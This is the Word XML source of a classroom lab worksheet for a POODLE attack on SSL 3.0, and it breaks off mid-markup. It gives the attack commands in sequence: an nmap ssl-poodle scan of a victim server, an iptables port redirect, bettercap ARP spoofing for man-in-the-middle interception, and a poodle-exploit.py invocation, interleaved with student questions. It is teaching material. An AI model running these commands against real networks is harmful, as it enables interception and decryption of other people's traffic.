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before="12.718505859375" w:line="199.92000102996826" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="3005.87951660156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ab/>
        <w:tab/>
        <w:t xml:space="preserve"> Hands-On: POODLE ATTACK </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:drawing>
          <wp:anchor allowOverlap="1" behindDoc="0" distB="19050" distT="19050" distL="19050" distR="19050" hidden="0" layoutInCell="1" locked="0" relativeHeight="0" simplePos="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4619625</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>42863</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="685800" cy="506730"/>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 cy="506730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="13.1201171875" w:lin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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Estimated time: 60-75  minutes </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="627.119140625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2.15988159179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workshop should be completed individually.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="257.51953125" w:line="280.8873653411865" w:lineRule="auto"/>
        <w:ind w:left="16.079864501953125" w:right="57.67822265625" w:hanging="11.51992797851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POODLE attack </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is an exploit that an attacker can utilize to take advantage of the way browsers handle encryption. A </w:t>
      </w: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adding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> O</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">racle</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> O</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">n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owngraded </w:t>
      </w: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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">egacy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">E</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ncryption can directly target browser-based communication that relies on Secure Socket Layer(SSL) 3.0 protocol for encryption and authentication. An MitM (man in the middle) attacker may use this vulnerability by exploiting POODLE and inserting themselves into a communication session and forcing the browser to use SSL 3.0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="257.51953125" w:line="280.8873653411865" w:lineRule="auto"/>
        <w:ind w:left="16.079864501953125" w:right="57.67822265625" w:hanging="11.519927978515625"/>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21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214.5654296875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="9.184722900390625" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:color w:val="365f91"/>
          <w:sz w:val="28.079999923706055"/>
          <w:szCs w:val="28.079999923706055"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:color w:val="365f91"/>
          <w:sz w:val="28.079999923706055"/>
          <w:szCs w:val="28.079999923706055"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 – Use Nmap to target exploitable server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="267.506103515625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="18.959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widowControl w:val="0"/>
        <w:spacing w:before="350.8648681640625" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="7.67990112304687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Nmap </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a tool used as a network scanner; Nmap can discover hosts and services on a computer network by sending packets and analyzing the responses. In this case, we will utilize Nmap to check the TLS/SSL version of the server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="257.5201416015625" w:line="281.88743591308594" w:lineRule="auto"/>
        <w:ind w:left="2.159881591796875" w:right="570.360107421875" w:firstLine="16.8000793457031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widowControl w:val="0"/>
        <w:spacing w:before="257.5201416015625" w:line="281.88743591308594" w:lineRule="auto"/>
        <w:ind w:left="2.159881591796875" w:right="570.360107421875" w:firstLine="16.800079345703125"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">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now going to check if the address is vulnerable to the attack. Enter this command into the terminal in the attacker machine:</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nmap -sV --version-light --script ssl-poodle -p 443 &lt;enter victim server ip&gt;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980000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   Based on your observations,</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in your own words, do your best to briefly describe </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">why an attack would use Nmap for a POODLE attack</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="980000"/>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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="11.992645263671875" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:color w:val="365f91"/>
          <w:sz w:val="28.079999923706055"/>
          <w:szCs w:val="28.079999923706055"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 – Initiate attack</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="305.5206298828125" w:line="727.7081680297852" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="187.9589843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a terminal window in the attacker machine, you will use the following command to find the machines’ IP address:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="305.5206298828125" w:line="727.7081680297852" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="187.958984375" w:firstLine="72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Ifconfig </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="305.5206298828125" w:line="727.7081680297852" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="187.958984375" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hint: the address will be listed under the eth0 network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="305.5206298828125" w:line="727.7081680297852" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="187.958984375" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker IP Address ____________</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="305.5206298828125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="187.95898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widowControl w:val="0"/>
        <w:spacing w:before="305.5206298828125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="187.95898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python script being run will act as a proxy, this will allow easier implementation of the POODLE attack. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="305.5206298828125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="187.95898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widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="305.5206298828125" w:line="727.7081680297852" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="187.9589843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same attacker machines terminal you will write the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="305.5206298828125" w:line="727.7081680297852" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="187.958984375"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python3 httpserver.py </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">step1IPAddressHere</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20">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="305.5206298828125" w:line="727.7081680297852" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="187.958984375" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hint: the IP address will be the same one found as in step 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="305.5206298828125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="187.958984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widowControl w:val="0"/>
        <w:spacing w:before="305.5206298828125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="187.958984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shell code will set up the environment for a POODLE attack by incorporating bettercap arp.spoof and enabling port forwarding. In most cases, this can be done manually.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="305.5206298828125" w:line="727.7081680297852" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="187.958984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widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="305.5206298828125" w:line="727.7081680297852" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="187.9589843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a second terminal tab within the attacker machine you will write the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">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iptables -i eth0 -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">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bettercap -iface eth0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">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 arp.spoof.internal true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">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arp.spoof on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="305.5206298828125" w:line="727.7081680297852" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="187.958984375" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="305.5206298828125" w:line="727.7081680297852" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="187.958984375" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="348" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="187.95898437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widowControl w:val="0"/>
        <w:spacing w:line="348" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="187.958984375"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Keep the two terminal windows OPEN during the duration of the workshop</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="305.5206298828125" w:line="727.7081680297852" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="187.9589843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a third terminal in the attacker machine where you will execute the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="348" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="187.958984375"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python3 ./poodle-exploit.py </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">attackerIP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4443 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">serverIP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 443 --start-block </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">49</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--stop-block </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">52</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="348" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="187.958984375" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="980000"/>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980000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    Based on your observations,</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in your own words, do your best to briefly describe </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">what you think the --start-block and --stop-block is used for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pP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_____________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:widowControl w:val="0"/>
